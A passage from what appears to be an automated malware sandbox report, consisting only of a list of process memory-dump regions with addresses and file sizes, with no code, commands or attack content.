                                                                                                                                                                                                                                                    • memory/1368-200-0x000001F73DDB0000-0x000001F73DDFC000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                                                    • memory/1368-202-0x000001F73DE70000-0x000001F73DEE1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                    • memory/1376-207-0x00000221099D0000-0x0000022109A41000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                    • memory/1632-114-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/1664-425-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/1952-213-0x000002C721B40000-0x000002C721BB1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                    • memory/2084-144-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/2204-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/2220-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/2224-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/2276-148-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/2288-149-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/2300-437-0x00000000011D0000-0x00000000011D1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/2300-440-0x00000000011D2000-0x00000000011D3000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/2300-420-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/2432-210-0x0000019A1AA60000-0x0000019A1AAD1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                    • memory/2440-212-0x000001D4A3FB0000-0x000001D4A4021000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                    • memory/2560-414-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/2680-282-0x000002C271C50000-0x000002C271CC1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                    • memory/2696-289-0x000001F4C8F80000-0x000001F4C8FF1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                    • memory/2840-204-0x000001C578550000-0x000001C5785C1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                    • memory/2976-184-0x00007FF7D6A44060-mapping.dmp
                                                                                                                                                                                                                                                    • memory/2976-206-0x000002557BF20000-0x000002557BF91000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                    • memory/3044-263-0x0000000000FA0000-0x0000000000FB5000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      84KB

                                                                                                                                                                                                                                                    • memory/3044-406-0x0000000002C70000-0x0000000002C86000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      88KB

                                                                                                                                                                                                                                                    • memory/3180-290-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      120KB

                                                                                                                                                                                                                                                    • memory/3180-346-0x0000000000400000-0x0000000000401000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/3180-317-0x0000000000418826-mapping.dmp
                                                                                                                                                                                                                                                    • memory/3180-369-0x00000000056F0000-0x0000000005CF6000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      6.0MB

                                                                                                                                                                                                                                                    • memory/3232-452-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/3376-423-0x000000000041882E-mapping.dmp
                                                                                                                                                                                                                                                    • memory/3376-435-0x0000000005690000-0x0000000005C96000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      6.0MB

                                                                                                                                                                                                                                                    • memory/3520-367-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/3584-320-0x00000217DE0C0000-0x00000217DE134000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      464KB

                                                                                                                                                                                                                                                    • memory/3584-360-0x00000217DE1A0000-0x00000217DE1BB000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      108KB

                                                                                                                                                                                                                                                    • memory/3584-363-0x00000217E0A00000-0x00000217E0B06000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                                                                    • memory/3584-308-0x00000217DDF30000-0x00000217DDF7E000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      312KB

                                                                                                                                                                                                                                                    • memory/3584-297-0x00007FF7D6A44060-mapping.dmp
                                                                                                                                                                                                                                                    • memory/3604-145-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/3620-166-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/3688-401-0x0000000005170000-0x0000000005776000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      6.0MB

                                                                                                                                                                                                                                                    • memory/3688-380-0x000000000041882E-mapping.dmp
                                                                                                                                                                                                                                                    • memory/3744-154-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/3776-410-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/3856-151-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/3864-168-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4048-175-0x0000000000BB0000-0x0000000000C4D000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      628KB

                                                                                                                                                                                                                                                    • memory/4048-173-0x0000000000400000-0x00000000008F2000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4.9MB

                                                                                                                                                                                                                                                    • memory/4048-157-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4056-172-0x0000000000030000-0x0000000000039000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                                    • memory/4056-174-0x0000000000400000-0x0000000000896000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4.6MB

                                                                                                                                                                                                                                                    • memory/4056-156-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4140-376-0x0000000000400000-0x00000000004A1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      644KB

                                                                                                                                                                                                                                                    • memory/4140-373-0x000000000046B76D-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4228-377-0x0000000000402E1A-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4228-385-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                                    • memory/4232-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4484-413-0x0000000000400000-0x0000000000495000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      596KB

                                                                                                                                                                                                                                                    • memory/4484-408-0x000000000044003F-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4500-403-0x0000000004E60000-0x0000000005466000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      6.0MB

                                                                                                                                                                                                                                                    • memory/4500-381-0x000000000041884E-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4528-419-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4676-374-0x00000000001C0000-0x00000000001CA000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      40KB

                                                                                                                                                                                                                                                    • memory/4676-223-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4688-349-0x0000000004F10000-0x000000000540E000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      5.0MB

                                                                                                                                                                                                                                                    • memory/4688-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4688-288-0x00000000006B0000-0x00000000006B1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4704-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4716-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4716-370-0x000001F22E7E0000-0x000001F22E850000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      448KB

                                                                                                                                                                                                                                                    • memory/4716-372-0x000001F22EC10000-0x000001F22ECE1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      836KB

                                                                                                                                                                                                                                                    • memory/4760-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4776-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4776-343-0x0000000000960000-0x0000000000979000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      100KB

                                                                                                                                                                                                                                                    • memory/4776-278-0x000000001B140000-0x000000001B142000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                    • memory/4776-252-0x00000000004D0000-0x00000000004D1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4776-350-0x0000000002420000-0x0000000002421000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4784-322-0x00000000006F0000-0x00000000006F1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4784-345-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4784-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4796-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4796-338-0x0000000002450000-0x0000000002451000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4796-323-0x0000000004920000-0x0000000004921000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4796-312-0x00000000000D0000-0x00000000000D1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4796-340-0x00000000024C0000-0x00000000024C1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4808-273-0x0000000000CF0000-0x0000000000CF1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4808-365-0x0000000001340000-0x0000000001341000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4808-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4808-357-0x0000000005980000-0x0000000005981000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4816-347-0x0000000004F70000-0x0000000004F71000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4816-276-0x0000000000750000-0x0000000000751000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4816-335-0x0000000000CB0000-0x0000000000CCB000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      108KB

                                                                                                                                                                                                                                                    • memory/4816-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4824-303-0x0000000004CF0000-0x0000000004CF1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4824-299-0x0000000005150000-0x0000000005151000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4824-325-0x0000000004B20000-0x0000000004B21000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4824-286-0x00000000000E0000-0x00000000000E1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4824-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4836-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4848-268-0x0000000000690000-0x0000000000691000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4848-315-0x00000000051E0000-0x00000000051E1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4848-243-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4848-328-0x0000000004F90000-0x0000000004F91000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4856-331-0x0000000005590000-0x0000000005591000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4856-354-0x0000000002D50000-0x0000000002D51000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4856-352-0x0000000005870000-0x0000000005871000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4856-287-0x0000000000B30000-0x0000000000B31000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4856-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4896-405-0x0000000000400000-0x00000000032A4000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      46.6MB

                                                                                                                                                                                                                                                    • memory/4896-390-0x0000000004F80000-0x000000000501D000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      628KB

                                                                                                                                                                                                                                                    • memory/4896-283-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4948-450-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/5076-326-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/5112-265-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/5112-336-0x0000000007A40000-0x0000000007F3E000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      5.0MB

                                                                                                                                                                                                                                                    • memory/5112-285-0x0000000000A30000-0x0000000000A31000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/5128-453-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/5200-457-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/5360-468-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/5360-471-0x0000000004BB5000-0x0000000004CB6000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                                                                    • memory/5360-473-0x0000000004D30000-0x0000000004D8F000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      380KB

                                                                                                                                                                                                                                                    • memory/5460-478-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/5476-480-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/5492-486-0x0000000000424141-mapping.dmp
                                                                                                                                                                                                                                                    • memory/5560-487-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/5580-489-0x0000000000000000-mapping.dmp